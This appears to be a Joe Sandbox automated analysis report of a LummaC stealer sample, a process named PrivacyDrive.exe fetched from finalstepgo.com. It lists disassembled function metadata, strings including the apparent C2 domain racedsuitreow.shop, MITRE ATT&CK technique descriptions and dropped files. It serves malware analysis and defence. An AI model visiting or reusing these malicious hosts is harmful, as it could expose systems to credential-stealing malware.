V, xrefs: 05A66FE9
[, xrefs: 05A66FB2
p=-u, xrefs: 05A66F63
c, xrefs: 05A66F8A
Q, xrefs: 05A66FD0
_, xrefs: 05A66FC6

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Q$S$U$V$W$Y$[$]$_$a$c$e$g$p=-u
API String ID: 2610073882-1313875254
Opcode ID: 09b77b40b87a8b9c762e9d1f9b96ef22900b61e0e27ee2b9b51c5d003b148b94
Instruction ID: eecf5c6c081c2dc58ab9f161d262ff356d2afdd89f6e7bb2c1cfde7acefd2604
Opcode Fuzzy Hash: 09b77b40b87a8b9c762e9d1f9b96ef22900b61e0e27ee2b9b51c5d003b148b94
Instruction Fuzzy Hash: E241F37000C7C19AD361DB28858875FBFE0AB96328F484A8DF4E9573D2C7B98509CB63

Function 05A67B1D Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 76COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 05A67B2F
VariantInit.OLEAUT32 ref: 05A67B42

Strings

a, xrefs: 05A67B5F
S, xrefs: 05A67BB9
Q, xrefs: 05A67BAF
Y, xrefs: 05A67B87
_, xrefs: 05A67BA5
W, xrefs: 05A67BCD
e, xrefs: 05A67B73
U, xrefs: 05A67BC3
g, xrefs: 05A67B7D
c, xrefs: 05A67B69
V, xrefs: 05A67BC8
p=-u, xrefs: 05A67B42
], xrefs: 05A67B9B
[, xrefs: 05A67B91

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Q$S$U$V$W$Y$[$]$_$a$c$e$g$p=-u
API String ID: 2610073882-1313875254
Opcode ID: a8c93607e17f539d78d3be9e4d0b40d70b4bb367843289c6f1775ea08db59526
Instruction ID: 373c8a1adc88159772336614c3c49343f7e5ad0652b83b2eb59bace72fee6ea0
Opcode Fuzzy Hash: a8c93607e17f539d78d3be9e4d0b40d70b4bb367843289c6f1775ea08db59526
Instruction Fuzzy Hash: A041E27000C7C1DED351DB28849865FBFE0AB96328F581A8DF4E94B2D2C7B58549CB67

Function 05A677CB Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 92COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 05A67818

Strings

7, xrefs: 05A678E3
?, xrefs: 05A67853
!, xrefs: 05A67883
(, xrefs: 05A678D3
5, xrefs: 05A67873
p=-u, xrefs: 05A67818
8, xrefs: 05A67843
8, xrefs: 05A67833
,, xrefs: 05A678B3
?, xrefs: 05A678C3
&, xrefs: 05A67863
0, xrefs: 05A67893

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: InitVariant
String ID: !$&$($,$0$5$7$8$8$?$?$p=-u
API String ID: 1927566239-161879947
Opcode ID: 60c3a34586e4eda7c7f7a3e1a52d836c726171f721f2b8f98fc727eecdd16d1c
Instruction ID: ed09659efe2b48a5d4b360fbb1ea47043a02cf1daf5e2df64f2ac5406675551a
Opcode Fuzzy Hash: 60c3a34586e4eda7c7f7a3e1a52d836c726171f721f2b8f98fc727eecdd16d1c
Instruction Fuzzy Hash: C851C37011C7C58ED336DB6884597DEBFE0ABA6314F044A5DE5E84B392C7B44245CB93

Function 05A65A34 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 05A65A3E
VariantInit.OLEAUT32 ref: 05A65A51

Strings

7, xrefs: 05A65AB7
?, xrefs: 05A65A77
:, xrefs: 05A65AFF
p=-u, xrefs: 05A65A51
5, xrefs: 05A65AA7
/, xrefs: 05A65AEF
', xrefs: 05A65B0F
1, xrefs: 05A65A87
3, xrefs: 05A65A97
4, xrefs: 05A65ACF

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: '$/$1$3$4$5$7$:$?$p=-u
API String ID: 2610073882-4122996778
Opcode ID: d3489f59fab88072f888c8cb0dde7e1af5021c9a960ecd04a9349746d29c93c0
Instruction ID: 0ae23658e64643f71d0523998a9ed043769d206622f8b76c0475f8c62b4818eb
Opcode Fuzzy Hash: d3489f59fab88072f888c8cb0dde7e1af5021c9a960ecd04a9349746d29c93c0
Instruction Fuzzy Hash: FB41C77010C7C28ED332DB689458BDEBFE0ABA6314F048E6ED4E947692D7745185CB23

Function 05A42E57 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 287COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 05A42E6C

Strings

eg, xrefs: 05A4318E
[`ST, xrefs: 05A42F66
il^l, xrefs: 05A42F5B
racedsuitreow.shop, xrefs: 05A432E0
kbe[, xrefs: 05A42F71
lebS, xrefs: 05A42F87
ZW, xrefs: 05A431A4

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Uninitialize
String ID: ZW$[`ST$eg$il^l$kbe[$lebS$racedsuitreow.shop
API String ID: 3861434553-2430485684
Opcode ID: bc8651328126d3837f4729238b149b2bcab1ee85417a4e8bdc4d1a05cc5b6e46
Instruction ID: 6fee04e67e79ec4b5e19f88d1d93b0fba1d0c3976291e29e47f9173b221f2772
Opcode Fuzzy Hash: bc8651328126d3837f4729238b149b2bcab1ee85417a4e8bdc4d1a05cc5b6e46
Instruction Fuzzy Hash: 63B121B400E3C1DAEB218F558494BAFBBE0BFD6344F54095DE4D99B282C7368545CF62

Function 05A5CD5F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,F73009C7,00000000), ref: 05A5CDFE
CopyFileW.KERNEL32(?,F73009C7,00000000,?,F73009C7,00000000), ref: 05A5CE18

Strings

rD, xrefs: 05A5CE54
EA, xrefs: 05A5CE5C
Kq, xrefs: 05A5CE4C

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: CopyFile
String ID: EA$Kq$rD
API String ID: 1304948518-3130877478
Opcode ID: d0df66654fca61820ed89695230a6f15673ab4d8bcaf39b6f22fc70feb933818
Instruction ID: 14f4ecc8561f34e04f9fe6ed3f35206daacfa08f2fab1ac17124b243b6c04546
Opcode Fuzzy Hash: d0df66654fca61820ed89695230a6f15673ab4d8bcaf39b6f22fc70feb933818
Instruction Fuzzy Hash: 4531BDB450D340ABE341DF14E598A1EBBE5AB96658F901D1CF4D49A220D338CA52CFA7

Function 05A63EE0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

Strings

}jbg, xrefs: 05A64078
qbio, xrefs: 05A6408C
qh>a, xrefs: 05A64082

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: qbio$qh>a$}jbg
API String ID: 0-1266614249
Opcode ID: 555b8e104264ca55f1d8bd9179adad62ca80dab0f36232efc612569bc36ca36d
Instruction ID: 33fde52034890959183db46cd739ff98f6a03aa587db005b50035d255da5d2fb
Opcode Fuzzy Hash: 555b8e104264ca55f1d8bd9179adad62ca80dab0f36232efc612569bc36ca36d
Instruction Fuzzy Hash: D771D031504B428FEB258F25C855FA3BBF1AF62314F088A5DE4EA5B2D2DB35B106CB50

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://finalstepgo.com/uploads/il2.txt

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_fef1a7949e4fa8cb69f4d5963b96612fcca58a7_7d659330_04139ed1-6b2b-413a-87d3-3eb36da0d4e9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD517.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6DD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD70D.tmp.xml

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

C:\Users\user\Downloads\3b87bdb0-9cae-4aee-9c21-ee5d154420e7.tmp

C:\Users\user\Downloads\il222.zip (copy)

C:\Users\user\Downloads\il222.zip.crdownload

Windows Analysis Report
https://finalstepgo.com/uploads/il2.txt

Function 05A3F7B0 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Function 01010C6F Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 01010B1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 0101055F Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Function 05A6F006 Relevance: 1.5, APIs: 1, Instructions: 32
comCOMMON

Function 05A3D3C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
threadCOMMON

Function 05A6F073 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50
memoryCOMMON

Function 0106D227 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 05A6F66B Relevance: 3.1, APIs: 2, Instructions: 88
memoryCOMMON